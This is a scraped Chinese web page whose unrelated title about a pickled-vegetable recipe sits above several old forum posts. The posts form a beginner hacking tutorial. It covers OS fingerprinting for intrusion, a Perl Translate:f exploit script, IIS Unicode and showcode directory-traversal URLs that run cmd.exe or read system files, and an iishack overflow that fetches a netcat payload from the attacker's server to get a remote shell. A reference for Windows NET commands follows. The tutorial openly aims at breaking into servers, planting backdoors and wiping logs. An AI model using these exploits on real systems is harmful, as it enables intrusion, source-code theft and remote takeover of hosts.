腌黄瓜咸菜的做法视频:PING命令

来源:百度文库 编辑:九乡新闻网 时间:2024/04/28 02:24:12
icefeel 发表于 2005-7-30 20:39:06

对操作系统的认识,对于每一个从事计算行业的人都是非常重要,要成为一名黑客更是要对操作系统有深入、深刻的认识。下面就和大家一起来探讨一下这方面的问题。
我们先来看分析一下一个黑客入侵的基本过程:1、判断入侵对象的操作系统—>2、描扫端口,判断开放了那些服务(这两步有可能同时进行)—>3、跟据操作系统和所开放的服务选择入侵方法,通常有“溢出”和“弱口猜测”两种方法—>4、获得系统的最高权力—>5、安放后门、清除日志走人( :)也许有格盘走人的)。
由上面可以知道,在整个过程当中对操作系统类型的判断识别是最基本也是很关系的一步。可想而知,如果你连对方的操作系统是什么都不知道,要想入侵跟本无从谈起。
也许很少人问过自己,我们为什么要先了解对方的操作系统呢?其实,我们了解操作系统的原因是因为我们要了解系统内存的工作况态,了解它是以什么方式,基于什么样的技术来控制内存,以及怎么样来处理输入与输出的数据的。世上任何东西都不可能是尽善尽美的(当然这也是我们人类不断追求的动力所在),作为复杂的计算机系统更如此,它在控制内存与处理数据的过程中总是有可能出错的(特别是在安装了其它的应用程序以后),系统本身也会存在各种各样的弱点与不足之处。黑客之所以能够入侵,就是利用了这些弱点与错误。现在网上流行的各种各样的入侵工具,都是黑客在分析了系统的弱点及存在的错之后编写出来的。(其中以“缓冲区溢出”最为常见)
作为一般的黑客,我们只要善于使用现成的入侵工具,就可以达到我们入侵的目的。但是因为不同的系统,其工作原理不一样,所以不同的入侵工具只能针对相应的操作系统。因此,对操作系统的识别是必不可少的,这就需要我们对操作系统有相当的了解,对网络有一定的基础识(要作黑客还是不那么容易的),关于各类操作系统的介绍,在网上有成堆的文章,大家可以自己去查阅。
在此介绍一此简单的操作系统识别方法给大家,希望对大家有用。
一、用ping来识别操作系统
C:>ping 10.1.1.2

Pinging 10.1.1.2 with 32 bytes of data:

Reply from 10.1.1.2: bytes=32 time<10ms TTL=128
Reply from 10.1.1.2: bytes=32 time<10ms TTL=128
Reply from 10.1.1.2: bytes=32 time<10ms TTL=128
Reply from 10.1.1.2: bytes=32 time<10ms TTL=128

Ping statistics for 10.1.1.2:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 0ms, Maximum = 0ms, Average = 0ms

C:>
C:>ping 10.1.1.6

Pinging 10.1.1.6 with 32 bytes of data:

Request timed out.
Reply from 10.1.1.6: bytes=32 time=250ms TTL=237
Reply from 10.1.1.6: bytes=32 time=234ms TTL=237
Reply from 10.1.1.6: bytes=32 time=234ms TTL=237

Ping statistics for 10.1.1.6:
Packets: Sent = 4, Received = 3, Lost = 1 (25% loss),
Approximate round trip times in milli-seconds:
Minimum = 234ms, Maximum = 250ms, Average = 179ms
我们跟据ICMP报文的TTL的值,我们就可以大概知道主机的类型。如:TTL=125左右的主机应该是windows系列的机子,TTL=235左右的主机应该是UINX系列的机子。如上面的两个例子,10.1.1.2就是win2000的机子,而10.1.1.6则是UINX(Sunos 5.8)的机子。这是因为不同操作系统的机子对ICMP报文的处理与应答是有所不同的,TTL值每过一个路由器会减1。所以造成了TTL回复值的不同。对于TTL值与操作系统类型的对应,还要靠大家平时多注意观察和积累。
二、直接通过联接端口根据其返回的信息来判操作系统
这种方法应该说是用得最多的一种方法,下面我们来看几个实例。
1、如果机子开了80端口,我们可以telnet(当然如果有NC最好用NC,它可以不用盲打)它的80端口。
Microsoft Windows 2000 [Version 5.00.2195]
(C) 版权所有 1985-1998 Microsoft Corp.

C:>telnet 10.1.1.2 80
输入get 回车(注意这里是盲打)
如果返回,
HTTP/1.1 400 Bad Request
Server: Microsoft-IIS/5.0
Date: Fri, 11 Jul 2003 02:31:55 GMT
Content-Type: text/html
Content-Length: 87

ErrorThe parameter is incorrect.

遗失对主机的连接。
C:>
那么这台就肯定是windows的机子。
如果返回,
501 Method <br>Not Implemented

Method Not Implemented

get to / not
supported.

Invalid method in request get


Apache/1.3.27 Server at gosiuniversity.com Port 80


遗失对主机的连接。
C:>
那么多数就是UINX系统的机子了。
2、如果机子开了21端口,我们可以直接FTP上去
C:>ftp 10.1.1.2
如果返回,
Connected to 10.1.1.2.
220 sgyyq-c43s950 Microsoft FTP Service (Version 5.0).
User (10.1.1.2none)):
那么这就肯定是一台win2000的机子了,我们还可以知道主机名呢,主机名就是sgyyq-c43s950。这个FTP是windows的IIS自带的一个FTP服务器。
如果返回,
Connected to 10.1.1.3.
220 Serv-U FTP Server v4.0 for WinSock ready...
User (10.1.1.3none)):
也可以肯定它是windows的机子,因为Serv-U FTP是一个专为windows平台开发的FTP服务器。
如果返回,
Connected to 10.1.1.3.
220 ready, dude (vsFTPd 1.1.0: beat me, break me)
User (10.1.1.3none)):
那么这就是一台UINX的机子了。
3、如果开了23端口,这个就简单了,直接telnet上去。
如果返回,
Microsoft (R) Windows (TM) Version 5.00 (Build 2195)
Welcome to Microsoft Telnet Service
Telnet Server Build 5.00.99201.1
login:
那么这肯定是一台windows的机子了
如果返回,
SunOS 5.8
login:
不用说了,这当然是一台UINX的机子了,并且版本是SunOS 5.8的。
三、利用专门的软件来识别
这种有识别操作系统功能的软件,多数采用的是操作系统协议栈识别技术。这是因为不同的厂家在编写自己操作系统时,TCP/IP协议虽然是统一的,但对TCP/IP协议栈是没有做统一的规定的,厂家可以按自己的要求来编写TCP/IP协议栈,从而造成了操作系统之间协议栈的不同。因此我们可以通过分析协议栈的不同来区分不同的操作系统,只要建立起协议栈与操作系统对应的数据库,我们就可以准确的识别操作系统了。目前来说,用这种技术识别操作系统是最准确,也是最科学的。因此也被称为识别操作系统的“指纹技术”。当然识别的能力与准确性,就要看各软件的数据库建立情况了。
下面是简单介绍两款有识别功能的软件。
1、 著名的nmap,它采用的是主动式探测,探测时会主动向目标系统发送探测包,根据目标目标机回应的数据包来,叛断对方机的操作系统。用法如下:
F: map>nmap -vv -sS -O 10.1.1.5

Starting nmap V. 3.00 ( www.insecure.org/nmap )
Host IS~123456ADCD (10.1.1.5) appears to be up ... good.
Initiating SYN Stealth Scan against IS~123456ADCD (10.1.1.5)
Adding open port 139/tcp
Adding open port 7070/tcp
Adding open port 554/tcp
Adding open port 23/tcp
Adding open port 1025/tcp
Adding open port 8080/tcp
Adding open port 21/tcp
Adding open port 5050/tcp
Adding open port 9090/tcp
Adding open port 443/tcp
Adding open port 135/tcp
Adding open port 1031/tcp
Adding open port 3372/tcp
Adding open port 25/tcp
Adding open port 1433/tcp
Adding open port 3389/tcp
Adding open port 445/tcp
Adding open port 80/tcp
The SYN Stealth Scan took 1 second to scan 1601 ports.
For OSScan assuming that port 21 is open and port 1 is closed and neither ar
rewalled
Interesting ports on IS~123456ADCD (10.1.1.5):
(The 1583 ports scanned but not shown below are in state: closed)
Port State Service
21/tcp open ftp
23/tcp open telnet
25/tcp open smtp
80/tcp open http
135/tcp open loc-srv
139/tcp open netbios-ssn
443/tcp open https
445/tcp open microsoft-ds
554/tcp open rtsp
1025/tcp open NFS-or-IIS
1031/tcp open iad2
1433/tcp open ms-sql-s
3372/tcp open msdtc
3389/tcp open ms-term-serv
5050/tcp open mmcc
7070/tcp open realserver
8080/tcp open http-proxy
9090/tcp open zeus-admin
Remote operating system guess: Windows 2000/XP/ME
OS Fingerprint:
TSeq(Class=RI%gcd=1%SI=21F8%IPID=I%TS=0)
T1(Resp=Y%DF=Y%W=FAF0%ACK=S++%Flags=AS%Ops=MNWNNT)
T2(Resp=Y%DF=N%W=0%ACK=S%Flags=AR%Ops=)
T3(Resp=Y%DF=Y%W=FAF0%ACK=S++%Flags=AS%Ops=MNWNNT)
T4(Resp=Y%DF=N%W=0%ACK=O%Flags=R%Ops=)
T5(Resp=Y%DF=N%W=0%ACK=S++%Flags=AR%Ops=)
T6(Resp=Y%DF=N%W=0%ACK=O%Flags=R%Ops=)
T7(Resp=Y%DF=N%W=0%ACK=S++%Flags=AR%Ops=)
PU(Resp=Y%DF=N%TOS=0%IPLEN=38%RIPTL=148%RIPCK=E%UCK=E%ULEN=134%DAT=E)

TCP Sequence Prediction: Class=random positive increments
Difficulty=8696 (Worthy challenge)
TCP ISN Seq. Numbers: 5B9022E2 5B914E12 5B92A495 5B93915A 5B94A9B5 5B95CC64
IPID Sequence Generation: Incremental

Nmap run completed -- 1 IP address (1 host up) scanned in 2 seconds

其中 Remote operating system guess: Windows 2000/XP/ME 这行就是NMAP对操作系统类型的判断。还返回了好多信息,NMAP不愧为扫描之王。(哈哈,黑客必备哦!)
2、 天眼,采用的是被动式的探测方法。不向目标系统发送数据包,只是被动地探测网络上的通信数据,通过分析这些数据来判断操作系统的类型。配合supersan使用,较果很好。
具体的使用方法,在此就不具体介绍了。有兴趣的的朋友可以到网上搜一下关于天眼使用方法的文章,会有很多的。(其实我自己也不太了解,呵呵~~)
以上讲解了一些对操作系统识别的基本方法,希望对初学者有用。由于本人水平有限,不当之处,还请高手斧正!


已被浏览601次 评论 (3) :: 引用(183)
流光的初级教程<5>
linlin00 于 2004年 08月14日 发表
(12)、Translate:f Bug
这个漏洞发布于2000年8月15号(www.securityfocus.com/bid/1578),其问题是存在OFFICE 2000和FRONTPAGE 2000Server Extensions中的WebDAV中,当有人请求一个ASP/ASA后者其他任意脚本的时候在HTTP GET加上Translate:f后缀,并在请求文件后面加/就会显示文件代码,当然在没有打WIN2K SP1补丁为前提。这个是W2K的漏洞,但由于FP2000也安装在IIS4.0上,因此在IIS4.0上也有这个漏洞,你可而已使用下面的脚本来利用这个漏洞:
#############################
use IO::Socket; #
my ($port, $sock,$server); #
$size=0; #
#############################
#
$server="$ARGV[0]";
$s="$server";
$port="80";
$cm="$ARGV[1]";
&connect;
sub connect {
if ($#ARGV《1) {
howto();
exit;
}
$ver="GET /$cm%5C HTTP/1.0
Host: $server
Accept: */*
Translate: f
";
my($iaddr,$paddr,$proto);
$iaddr = inet_aton($server) || die "Error: $!";
$paddr = sockaddr_in($port, $iaddr) || die "Error: $!";
$proto = getprotobyname(‘tcp‘) || die "Error: $!";
socket(SOCK, PF_INET, SOCK_STREAM, $proto) || die "Error:
$!";
connect(SOCK, $paddr) || die "Error: $!";
send(SOCK, $ver, 0) || die "Can‘t to send packet: $!";
open(OUT, "》$server.txt");
print "Dumping $cm to $server.txt ";
while(《SOCK》) {
print OUT 《SOCK》;
}
sub howto {
print "type as follows: Trans.pl www.目标机.com codetoview.asp ";
}
close OUT;
$n=0;
$type=2;
close(SOCK);
exit(1);
}

你可以使用下面的方法来获得源代码:
Trasn.pl www.目标机.com default.asp

(13)、IIS存在的Unicode解析错误漏洞
NSFOCUS安全小组发现微软IIS 4.0和IIS 5.0在Unicode字符解码的实现中存在一个安全漏洞,导致用户可以远程通过IIS执行任意命令。当IIS打开文件时,如果该文件名包含unicode字符,它会对其进行解码,如果用户提供一些特殊的编码,将导致IIS错误的打开或者执行某些web根目录以外的文件。
你可以使用下面的方法利用这个漏洞:
(1) 如果系统包含某个可执行目录,就可能执行任意系统命令。下面的URL可能列出当前目录的内容:
http://www.目标机.com/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
(2) 利用这个漏洞查看系统文件内容也是可能的:

http://www.目标机.com/a.asp/..%c1%1c../..%c1%1c../winnt/win.ini
这个漏洞是针对中文操作平台,你也可以使用"%c0%af"或者"%c1%9c"来测试英文版本,原因就是编码不同。


已被浏览422次 评论 (0) :: 引用(151)
流光的初级教程<4>
linlin00 于 2004年 08月14日 发表
2.常见漏洞

(1)、Null.htw
IIS如果运行了Index Server就包含了一个通过Null.htw有关的漏洞,即服务器上不存在此.htw结尾的文件。这个漏洞会导致显示ASP脚本的源代码, global.asa里面包含了用户帐户等敏感信息。如果攻击者提供特殊的URL请求给IIS就可以跳出虚拟目录的限制,进行逻辑分区和ROOT目录的访问。而这个"hit-highlighting"功能在Index Server中没有充分防止各种类型文件的请求,所以导致攻击者访问服务器上的任意文件。Null.htw功能可以从用户输入中获得3个变量:
CiWebhitsfile
CiRestriction
CiHiliteType
你可通过下列方法传递变量来获得如default.asp的源代码:
http://www.目标机.com/null.htw?CiWebhitsfile=/default.asp%20&%20
CiRestriction=none%20&%20&CiHiliteType=full其中不需要一个合法的.htw文件是因为虚拟文件已经存储在内存中了。

(2)、MDAC- 执行本地命令漏洞
这个漏洞出现得比较早,但在全球范围内,可能还有好多IIS WEB服务器存在这个漏洞,就像在今天,还有很多人在用Windows3.2一样。IIS的MDAC组件存在一个漏洞,可以导致攻击者远程执行目标系统的命令。主要核心问题是存在于RDSDatafactory,默认情况下,它允许远程命令发送到IIS服务器中,这命令会以设备用户的身份运行,在默认情况下是SYSTEM用户。我们可以通过以下办法测试本机是否存在这个漏洞:
c:》nc -nw -w 2 《目标机》 80
GET /msadc/msadcs.dll HTTP
如果你得到下面的信息:
application/x_varg
就很有可能存在此漏洞且没有打上补丁,你可以使用rain forest puppy网站的两个程序进行测(www.wiretrip.net/rfp)==》mdac.pl和msadc2.pl。

(3)、ASP Dot Bug
这个漏洞出现得比较早了,是Lopht小组在1997年发现的缺陷,这个漏洞也是泄露ASP源代码给攻击者,一般在IIS3.0上存在此漏洞,在请求的URL结尾追加一个或者多个点导致泄露ASP源代码。http://www.目标机.com/sample.asp.

(4)、idc & .ida Bugs
这个漏洞实际上类似ASP dot 漏洞,其能在IIS4.0上显示其WEB目录信息,很奇怪有些人还在IIS5.0上发现过此类漏洞,通过增加?idc?或者?ida?后缀到URL会导致IIS尝试允许通过数据库连接程序.DLL来运行.IDC,如果此.idc不存在,它就返回一些信息给客户端。
http://www.目标机.com/anything.idc 或者 anything.idq
(5)、+.htr Bug
这个漏洞是由NSFOCUS发现的,对有些ASA和ASP追加+.htr的URL请求就会导致文件源代码的泄露:
http://www.目标机.com/global.asa+.htr

(6)、NT Site Server Adsamples 漏洞
通过请求site.csc,一般保存在/adsamples/config/site.csc中,攻击者可能获得一些如数据库中的DSN,UID和PASS的一些信息,如:
http://www.目标机.com/adsamples/config/site.csc

(7)、IIS HACK
有人发现了一个IIS4.0的缓冲溢出漏洞,可以允许用户上载程序,如上载netcat到目标服务器,并把cmd.exe绑定到80端口。这个缓冲溢出主要存在于.htr,.idc和.stm文件中,其对关于这些文件的URL请求没有对名字进行充分的边界检查,导致运行攻击者插入一些后门程序在系统中下载和执行程序。要检测这样的站点你需要两个文件iishack.exe,ncx.exe,你可以到站点www.technotronic.com中去下载,另外你还需要一台自己的WEB服务器,也可以是虚拟服务器哦。你现在你自己的WEB服务器上运行WEB服务程序并把ncx.exe放到你自己相应的目录下,然后使用iishack.exe来检查目标机器:
c:》iishack.exe 《目标机》 80 《你的WEB服务器》/ncx.exe
然后你就使用netcat来连接你要检测的服务器:
c:》nc 《目标机》 80
如果溢出点正确,你就可以看到目标机器的命令行提示,并且是远程管理权限。Codebrws.asp & Showcode.asp 。Codebrws.asp和Showcode.asp在IIS4.0中是附带的看文件的程序,但不是默认安装的,这个查看器是在管理员允许查看样例文件作为联系的情况下安装的。但是,这个查看器并没有很好地限制所访问的文件,远程攻击者可以利用这个漏洞来查看目标机器上的任意文件内容,但要注意以下几点:
1.Codebrws.asp和Showcode.asp默认情况下不安装。
2.漏洞仅允许查看文件内容。
3.这个漏洞不能绕过WINDOWS NT的ACL控制列表的限制。
4.只允许同一分区下的文件可以被查看(所以把IIS目录和WINNT分区安装是个不错的方案,这样也可能比较好的防止最新的IIS5.0的unicode漏洞).
5,攻击者需要知道请求的文件名。
例如你发现存在这个文件并符合上面的要求,你可以请求如下的命令:
http://www.目标机.com/iisamples/exair/howitworks/codebrws.asp?source=/
iisamples/exair/howitworks/codebrws.asp
你就可以查看到codebrws.asp的源代码了。
你也可以使用showcode.asp来查看文件:
http://www.目标机.com/msadc/samples/selector/showcode.asp?
source=/msadc/../../../../../winnt/win.ini
当然你也可以查看一些FTP信息来获得其他的目标管理员经常使用的机器,或许其他的机器的安全性比WEB服务器差,如:
http://xxx.xxx.xxx.xxx/msadc/Samples/SELECTOR/showcode.asp?
source=/msadc/Samples/../../../../../winnt/system32/logfiles/MSFTPSVC1/ex000517.log
(8)、webhits.dll & .htw
这个hit-highligting功能是由Index Server提供的允许一个WEB用户在文档上highlighted(突出)其原始搜索的条目,这个文档的名字通过变量CiWebhitsfile传递给.htw文件,Webhits.dll是一个ISAPI应用程序来处理请求,打开文件并返回结果,当用户控制了CiWebhitsfile参数传递给.htw时,他们就可以请求任意文件,结果就是导致可以查看ASP源码和其他脚本文件内容。要了解你是否存在这个漏洞,你可以请求如下条目:
http://www.目标机.com/nosuchfile.htw
如果你从服务器端获得如下信息:
format of the QUERY_STRING is invalid
这就表示你存在这个漏洞。
这个问题主要就是webhits.dll关联了.htw文件的映射,所以你只要取消这个映射就能避免这个漏洞,你可以在你认为有漏洞的系统中搜索.htw文件,一般会发现如下的程序:
/iissamples/issamples/oop/qfullhit.htw
/iissamples/issamples/oop/qsumrhit.htw
/isssamples/exair/search/qfullhit.htw
/isssamples/exair/search/qsumrhit.htw
/isshelp/iss/misc/iirturnh.htw (这个一般为loopback使用)
攻击者可以使用如下的方法来访问系统中文件的内容:
http://www.目标机.com/iissamples/issamples/oop/qfullhit.htw?
ciwebhitsfile=/../../winnt/win.ini&cirestriction=none&cihilitetype=full
就会在有此漏洞系统中win.ini文件的内容。
(9)、ASP Alternate Data Streams(::$DATA)
$DATA这个漏洞是在1998年中期公布的,$DATA是在NTFS文件系统中存储在文件里面的main data stream属性,通过建立一个特殊格式的URL,就可能使用IIS在浏览器中访问这个data stream(数据流),这样做也就显示了文件代码中这些data stream(数据流)和任何文件所包含的数据代码。
其中这个漏洞需要下面的几个限制,一个是要显示的这个文件需要保存在NTFS文件分区(幸好为了"安全"好多服务器设置了NTFS格式),第二是文件需要被ACL设置为全局可读。而且未授权用户需要知道要查看文件名的名字,WIN NT中的IIS1.0, 2.0, 3.0和4.0都存在此问题。微软提供了一个IIS3.0和4.0的版本补丁,
要查看一些.asp文件的内容,你可以请求如下的URL:
http://www.目标机.com/default.asp::$DATA 你就得到了源代码。你要了解下NTFS文件系统中的数据流问题,你或许可以看看这文章:
http://focus.silversand.net/newsite/skill/ntfs.txt
(10)、ISM.DLL 缓冲截断漏洞
这个漏洞存在于IIS4.0和5.0中,允许攻击者查看任意文件内容和源代码。通过在文件 名后面追加近230个+或者?%20?(这些表示空格)并追加?.htr?的特殊请求给IIS,会使IIS认为客户端请求的是?.htr?文件,而.htr文件的后缀映射到ISM.DLL ISAPI应用程序,这样IIS就把这个.htr请求转交给这个DLL文件,然后ISM.DLL程序把传递过来的文件打开和执行,但在ISM.DLL 截断信息之前,缓冲区发送一个断开的 .Htr 并会延迟一段时间来返回一些你要打开的文件内容。可是要注意,除非 WEB 服务停止并重启过,否则这攻击只能有效执行一次。如果已经发送过一个 .htr 请求到机器上,那么这攻击会失效.它只能在 ISM.DLL 第一次装入内存时工作。
http://www.目标机.com/global.asa%20%20(...《=230)global.asa.htr

(11)、存在的一些暴力破解威胁.htr程序
IIS4.0中包含一个严重漏洞就是允许远程用户攻击WEB服务器上的用户帐号,就是你的WEB服务器是通过NAT来转换地址的,还可以被攻击。每个IIS4.0安装的时候建立一个虚拟目录/iisadmpwd,这个目录包含多个.htr文件,匿名用户允许访问这些文件,这些文件刚好没有规定只限制在loopback addr(127.0.0.1),请求这些文件就跳出对话框让你通过WEB来修改用户的帐号和密码。这个目录物理映射在下面的目录下:
c:winntsystem32inetsrviisadmpwd
Achg.htr
Aexp.htr
Aexp2.htr
Aexp2b.htr
Aexp3.htr
Aexp4.htr
Aexp4b.htr
Anot.htr
Anot3.htr
这样,攻击者可以通过暴力来猜测你的密码。如果你没有使用这个服务,请立即删除这个目录。


已被浏览112次 评论 (0) :: 引用(19)
流光的初级教程<3>
linlin00 于 2004年 08月14日 发表
13)Net Print
作用:显示或控制打印作业及打印队列。
命令格式:net print [\computername ] job# [/hold | /release |
/delete]
参数介绍:
<1>computername共享打印机队列的计算机名。
<2>sharename打印队列名称。
<3>job#在打印机队列中分配给打印作业的标识号。
<4>/hold使用 job# 时,在打印机队列中使打印作业等待。
<5>/release释放保留的打印作业。
<6>/delete从打印机队列中删除打印作业。
简单事例:
<1>net print \YFANGSEEME列出\YFANG计算机上SEEME打印机队列的目录

(14)Net Name
作用:添加或删除消息名(有时也称别名),或显示计算机接收消息的名称列表。
命令格式:net name [name [/add | /delete]]
参数介绍:
<1>键入不带参数的net name列出当前使用的名称。
<2>name指定接收消息的名称。
<3>/add将名称添加到计算机中。
<4>/delete从计算机中删除名称。

(15)Net Localgroup
作用:添加、显示或更改本地组。
命令格式:net localgroup groupname {/add [/comment:"text "] | /delete}?
[/domain]
参数介绍:
<1>键入不带参数的net localgroup显示服务器名称和计算机的本地组名称。
<2>groupname要添加、扩充或删除的本地组名称。
<3>/comment: "text "为新建或现有组添加注释。
<4>/domain在当前域的主域控制器中执行操作,否则仅在本地计算机上执行操作
<5>name [ ...]列出要添加到本地组或从本地组中删除的一个或多个用户名或组名。
<6>/add将全局组名或用户名添加到本地组中。
<7>/delete从本地组中删除组名或用户名。
简单事例:
<1>net localgroup love /add将名为love的本地组添加到本地用户帐号数据库
<2>net localgroup love显示love本地组中的用户

(16)Net Group
作用:在 Windows NT Server 域中添加、显示或更改全局组。
命令格式:net group groupname {/add [/comment:"text "] | /delete}[/domain]
参数介绍:
<1>键入不带参数的net group显示服务器名称及服务器的组名称。
<2>groupname要添加、扩展或删除的组。
<3>/comment:"text "为新建组或现有组添加注释。 <4>/domain在当前域的主域控
制器中执行该操作,否则在本地计算机上执行操作
<5>username[ ...]列表显示要添加到组或从组中删除的一个或多个用户。
<6>/add添加组或在组中添加用户名。
<7>/delete删除组或从组中删除用户名。
简单事例:
<1>net group love yfang1 yfang2 /add将现有用户帐号yfang1和yfang2添加到本
地计算机的love组

(17)Net File
作用:显示某服务器上所有打开的共享文件名及锁定文件数。
命令格式:net file [id [/close]]
参数介绍:
<1>键入不带参数的net file获得服务器上打开文件的列表。
<2>id文件标识号。
<3>/close关闭打开的文件并释放锁定记录。

(18)Net Config
作用:显示当前运行的可配置服务,或显示并更改某项服务的设置。
命令格式:net config [service [options]]
参数介绍:
<1>键入不带参数的net config显示可配置服务的列表。
<2>service通过net config命令进行配置的服务(server或workstation)
<3>options服务的特定选项。

(19)Net Computer
作用:从域数据库中添加或删除计算机。
命令格式:net computer \computername {/add | /del}
参数介绍:
<1>\computername指定要添加到域或从域中删除的计算机。
<2>/add将指定计算机添加到域。
<3>/del将指定计算机从域中删除。
简单事例:
<1>net computer \cc /add将计算机 cc 添加到登录域

(20)Net Accounts?
作用:更新用户帐号数据库、更改密码及所有帐号的登录要求。
命令格式:net accounts [/forcelogoff:{minutes | no}] [/minpwlen:
length] [/maxpwage:{days | unlimited}] [/minpwage:days] [/uniquepw:
number] [/domain]
参数介绍:
<1>键入不带参数的net accounts显示当前密码设置、登录时限及域信息。
<2>/forcelogoff:{minutes | no}设置当用户帐号或有效登录时间过期时
<3>/minpwlen:length设置用户帐号密码的最少字符数。
<4>/maxpwage:{days | unlimited}设置用户帐号密码有效的最大天数。
<5>/minpwage:days设置用户必须保持原密码的最小天数。
<6>/uniquepw:number要求用户更改密码时,必须在经过number次后才能重复使用与之相同的密码。
<7>/domain在当前域的主域控制器上执行该操作。
<8>/sync当用于主域控制器时,该命令使域中所有备份域控制器同步
简单事例:
<1>net accounts /minpwlen:7
将用户帐号密码的最少字符数设置为7

上面介绍的是NET命令在WINNT下的基本用法,下面我们看看NET命令在WIN98下的基本用法。在WIN98中NET命令也有一些参数 其中有一些参数的名字和功能及简单的使用方法和WINNT下的相应的参数的用法相同,其中有
(1)NET TIME命令
(2)NET PRINT命令
(3)NET USE命令
(4)NET VIEW命令
在WIN98中NET命令有一些参数 其中有一些参数的名字和WINNT下的相应的参数的名字相同但其用法却有些不同,其中有
(1)NET START
作用:启动相应的服务。(不能在DOS-WIN中用)
命令格式:NET START [BASIC | NWREDIR | WORKSTATION | NETBIND | NETBEUI |NWLINK] [/LIST] [/YES] [/VERBOSE]
(2)NET STOP
作用:停止相应的服务.(不能在DOS-WIN中用)
命令格式:NET STOP [BASIC | NWREDIR | WORKSTATION | NETBEUI | NWLINK][/YES]

在WIN98中NET命令还有一些参数是在98下才有的,其中有
(1)NET DIAG
作用:运行MS的DIAGNOSTICS程序显示网络的DIAGNOSTIC信息
命令格式:NET DIAGNOSTICS [/NAMES | /STATUS]
(2)NET INIT
作用:不通过绑定来加载协议或网卡驱动(不能在DOS-WIN中用)
命令格式:NET INITIALIZE [/DYNAMIC]
(3)NET LOGOFF
作用:断开连接的共享资源(不能在DOS-WIN中用)
(4)NET LOGON
作用:在WORKGROUP中登陆(不能在DOS-WIN中用)
命令格式:NET LOGON [user [password | ?]] [/DOMAIN:name] [/YES][/SAVEPW:NO]
(5)NET PASSWORD
作用:更改你的网络登陆口令(不能在DOS-WIN中用)
命令格式:NET PASSWORD \computer | /DOMAIN:name [user [oldpassword?
[newpassword]]]

二.IIS攻击大全

这里介绍的方法主要通过端口80来完成操作,具有很大的威胁性,因为作为网络服务器80端口总要打开的。如果想方便一些,下载一些WWW、CGI扫描器来辅助检查。
而且要知道目标机器运行的是何种服务程序,你可以使用以下命令:
telnet 《目标机》 80
GET HEAD / HTTP/1.0
就可以返回一些域名和WEB服务程序版本,如果有些服务器把WEB服务运行在8080,81,8000,8001口,你就TELNET相应的口上。


已被浏览100次 评论 (0) :: 引用(9)
一.NET命令详细使用方法 !(有什么不明白的地方请回复提出)《二》
linlin00 于 2004年 08月14日 发表
7)Net Continue?
作用:重新激活挂起的服务。
命令格式:net continue service

(8)NET STOP
作用:停止 Windows NT 网络服务。
命令格式:net stop service
参数介绍:我们来看看这些服务都是什么
<1>alerter(警报)
<2>client service for netware(Netware 客户端服务)
<3>clipbook server(剪贴簿服务器)
<4>computer browser(计算机浏览器)
<5>directory replicator(目录复制器)
<6>ftp publishing service (ftp )(ftp 发行服务)
<7>lpdsvc
<8>net logon(网络登录) <9>network dde网络 dde)
<10>network dde dsdm(网络 dde dsdm)
<11>network monitor agent(网络监控代理)
<12>nt lm security support provider(NT LM 安全性支持提供)
<13>ole(对象链接与嵌入)
<14>remote access connection manager(远程访问连接管理器)
<15>remote access isnsap service(远程访问 isnsap 服务)
<16>remote access server(远程访问服务器)
<17>remote procedure call (rpc) locator(远程过程调用定位器)
<18>remote procedure call (rpc) service(远程过程调用服务)
<19>schedule(调度)
<20>server(服务器)
<21>simple tcp/ip services(简单 TCP/IP 服务)
<22>snmp
<23>spooler(后台打印程序)
<24>tcp/ip netbios helper(TCP/IP NETBIOS 辅助工具)
<25>ups (26)workstation(工作站)
<27>messenger(信使)
<28>dhcp client
<29>eventlog 以下这些SERVICE只能在NT SERVER上使用
<< 1>>)file server for macintosh
<<2>>gateway service for netware
<<3>>microsoft dhcp server
<<4>>print server for macintosh
<<5>>remoteboot
<<6>>windows internet name service

(9)Net Statistics
作用:显示本地工作站或服务器服务的统计记录。
命令格式:net statistics [workstation | server]
参数介绍:
<1>键入不带参数的net statistics列出其统计信息可用的运行服务。
<2>workstation显示本地工作站服务的统计信息。
<3>server显示本地服务器服务的统计信息。
简单事例:
<1>net statistics server | more显示服务器服务的统计信息

(10)Net Share
作用:创建、删除或显示共享资源。
命令格式:net share sharename=drive:path [/users:number | /unlimited]
[/remark:"text"]
参数介绍:?
<1>键入不带参数的net share显示本地计算机上所有共享资源的信息。
<2>sharename是共享资源的网络名称。
<3>drive:path指定共享目录的绝对路径。
<4>/users:number设置可同时访问共享资源的最大用户数。
<5>/unlimited不限制同时访问共享资源的用户数。
<6>/remark:"text "添加关于资源的注释,注释文字用引号引住。
简单事例:
<1>net share mylove=c: emp /remark:"my first share"以mylove为共享名共享
C: emp
<2>net share mylove /delete停止共享mylove目录?

(11)Net Session?
作用:列出或断开本地计算机和与之连接的客户端的会话,也可以写为net?
sessions或net sess。
命令格式:net session [\computername] [/delete]
参数介绍:
<1>键入不带参数的net session显示所有与本地计算机的会话的信息。
<2>\computername标识要列出或断开会话的计算机。
<3>/delete结束与\computername计算机会话并关闭本次会话期间计算机的所有

简单事例:
<1>net session \YFANG要显示计算机名为YFANG的客户端会话信息列表。

(12)Net Send
作用:向网络的其他用户、计算机或通信名发送消息。
命令格式:net send {name | * | /domain[:name] | /users} message 参数介绍:
<1>name要接收发送消息的用户名、计算机名或通信名。
<2>*将消息发送到组中所有名称。
<3>/domain[:name]将消息发送到计算机域中的所有名称。
<4>/users将消息发送到与服务器连接的所有用户。
<5>message作为消息发送的文本。
简单事例:
<1>net send /users server will shutdown in 5 minutes. 给所有连接到服务器的用户发送消息

 

已被浏览107次 评论 (0) :: 引用(16)
一.NET命令详细使用方法 !(有什么不明白的地方请回复提出)
linlin00 于 2004年 08月14日 发表
这篇文章综合了WINDOWS 98,WINDOWS WORKSTATION和WINDOWS SERVER 三个操作系统关于NET命令的解释,希望可以全面一些先说一些:

(1)NET命令是一个命令行命令。
(2)管理网络环境、服务、用户、登陆。。。。等本地信息
(3)WIN 98,WIN WORKSTATION和WIN NT都内置了NET命令。
(4)但WIN 98的NET命令和WORKSTATION、NT的NET命令不同。
(5)WORKSTATION和SERVER中的NET命令基本相同。
(6)获得HELP
<1>在NT下可以用图形的方式,开始-》帮助-》索引-》输入NET
<2>在COMMAND下可以用字符方式,NET /?或NET或NET HELP得到一些方法 相应的方法的帮助NET COMMAND /HELP或NET HELP COMMAND 或NET COMMAND /另对于错误NET HELPMSG MESSAGE#是4位数
(7)强制参数 所有net命令接受选项/yes和/no(可缩写为/y和/n)。[简单的说就是预先给系统的 提问一个答案]
(8)有一些命令是马上产生作用并永久保存的,使用的时候要慎重
